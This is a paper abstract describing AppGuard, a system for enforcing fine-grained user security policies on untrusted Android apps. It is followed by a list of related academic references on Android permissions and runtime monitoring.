AppGuard - Fine-Grained Policy Enforcement for Untrusted Android Applications

Android's success makes it a prominent target for malicious software. However, the user has very limited control over security-relevant operations. This work presents AppGuard, a powerful and flexible security system that overcomes these deficiencies. It enforces user-defined security policies on untrusted Android applications without requiring any changes to a smartphone's firmware, root access, or the like. Fine-grained and stateful security policies are expressed in a formal specification language, which also supports secrecy requirements. Our system offers complete mediation of security-relevant methods based on callee-site inline reference monitoring and supports widespread deployment. In the experimental analysis we demonstrate the removal of permissions for overly curious apps as well as how to defend against several recent real-world attacks on Android phones. Our technique exhibits very little space and runtime overhead. The utility of AppGuard has already been demonstrated by more than 1,000,000 downloads.

[1]  Ahmad-Reza Sadeghi,et al.  Privilege Escalation Attacks on Android , 2010, ISC.

[2]  Mauro Conti,et al.  CRePE: Context-Related Policy Enforcement for Android , 2010, ISC.

[3]  Seungyeop Han,et al.  These aren't the droids you're looking for: retrofitting android to protect data from imperious applications , 2011, CCS '11.

[4]  Frank Piessens,et al.  Security monitor inlining and certification for multithreaded Java , 2014, Mathematical Structures in Computer Science.

[5]  Kevin W. Hamlen,et al.  Aspect-Oriented Runtime Monitor Certification , 2012, TACAS.

[6]  Helen J. Wang,et al.  Permission Re-Delegation: Attacks and Defenses , 2011, USENIX Security Symposium.

[7]  Úlfar Erlingsson,et al.  SASI enforcement of security policies: a retrospective , 1999, Proceedings DARPA Information Survivability Conference and Exposition. DISCEX'00.

[8]  David A. Wagner,et al.  The Effectiveness of Application Permissions , 2011, WebApps.

[9]  Lujo Bauer,et al.  Composing security policies with polymer , 2005, PLDI '05.

[10]  Xinwen Zhang,et al.  Apex: extending Android permission model and enforcement with user-defined runtime constraints , 2010, ASIACCS '10.

[11]  Hao Chen,et al.  I-ARM-Droid : A Rewriting Framework for In-App Reference Monitors for Android Applications , 2012 .

[12]  Byung-Gon Chun,et al.  TaintDroid: An Information-Flow Tracking System for Realtime Privacy Monitoring on Smartphones , 2010, OSDI.

[13]  Fred B. Schneider,et al.  Enforceable security policies , 2000, Foundations of Intrusion Tolerant Systems, 2003 [Organically Assured and Survivable Information Systems].

[14]  Kevin W. Hamlen,et al.  Aspect-oriented in-lined reference monitors , 2008, PLAS '08.

[15]  Lujo Bauer,et al.  A Language and System for Composing Security Policies , 2004 .

[16]  Steve Hanna,et al.  Android permissions demystified , 2011, CCS '11.

[17]  Yajin Zhou,et al.  Systematic Detection of Capability Leaks in Stock Android Smartphones , 2012, NDSS.

[18]  Avik Chaudhuri,et al.  SCanDroid: Automated Security Certification of Android , 2009 .

[19]  Herbert Bos,et al.  Paranoid Android: versatile protection for smartphones , 2010, ACSAC '10.

[20]  Michael Backes,et al.  AppGuard - Enforcing User Requirements on Android Apps , 2013, TACAS.

[21]  Keith J. Jones,et al.  10th USENIX Security Symposium , 2001, login Usenix Mag..

[22]  Ahmad-Reza Sadeghi,et al.  XManDroid: A New Android Evolution to Mitigate Privilege Escalation Attacks , 2011 .

[23]  Úlfar Erlingsson,et al.  IRM enforcement of Java stack inspection , 2000, Proceeding 2000 IEEE Symposium on Security and Privacy. S&P 2000.

[24]  Ross J. Anderson,et al.  Aurasium: Practical Policy Enforcement for Android Applications , 2012, USENIX Security Symposium.

[25]  Patrick D. McDaniel,et al.  Porscha: policy oriented secure content handling in Android , 2010, ACSAC '10.

[26]  Michael Backes,et al.  Idea: Callee-Site Rewriting of Sealed System Libraries , 2013, ESSoS.

[27]  Todd D. Millstein,et al.  Dr. Android and Mr. Hide: fine-grained permissions in android applications , 2012, SPSM '12.

[28]  Grigore Rosu,et al.  Java-MOP: A Monitoring Oriented Programming Environment for Java , 2005, TACAS.

[29]  Yajin Zhou,et al.  Hey, You, Get Off of My Market: Detecting Malicious Apps in Official and Alternative Android Markets , 2012, NDSS.

[30]  Patrick D. McDaniel,et al.  On lightweight mobile phone application certification , 2009, CCS.

[31]  Byung-Gon Chun,et al.  Vision: automated security validation of mobile apps at app markets , 2011, MCS '11.

[32]  Patrick D. McDaniel,et al.  Semantically rich application-centric security in Android , 2012 .

[33]  Rajeev Alur,et al.  A Temporal Logic of Nested Calls and Returns , 2004, TACAS.

[34]  Ahmad-Reza Sadeghi,et al.  Towards Taming Privilege-Escalation Attacks on Android , 2012, NDSS.

[35]  Michael Backes,et al.  A Local Cross-Site Scripting Attack against Android Phones , 2011 .

[36]  Kevin W. Hamlen,et al.  Certified In-lined Reference Monitoring on .NET , 2006, PLAS '06.

[37]  J. Foster,et al.  SCanDroid: Automated Security Certification of Android , 2009 .

[38]  Swarat Chaudhuri,et al.  A Study of Android Application Security , 2011, USENIX Security Symposium.

[39]  Todd Millstein,et al.  Dr. Android and Mr. Hide: Fine-grained security policies on unmodified Android , 2011 .

[40]  Lujo Bauer,et al.  Modeling and Enhancing Android's Permission System , 2012, ESORICS.

[41]  Shashi Shekhar,et al.  QUIRE: Lightweight Provenance for Smart Phone Operating Systems , 2011, USENIX Security Symposium.

[42]  Hao Chen,et al.  AndroidLeaks: Detecting Privacy Leaks In Android Applications. , 2011 .

[43]  Paul C. van Oorschot,et al.  A methodology for empirical analysis of permission-based security models and its application to android , 2010, CCS '10.

[44]  Wouter Joosen,et al.  The S3MS.NET Run Time Monitor: Tool Demonstration , 2009, Electron. Notes Theor. Comput. Sci..

[45]  Lujo Bauer,et al.  Edit automata: enforcement mechanisms for run-time security policies , 2005, International Journal of Information Security.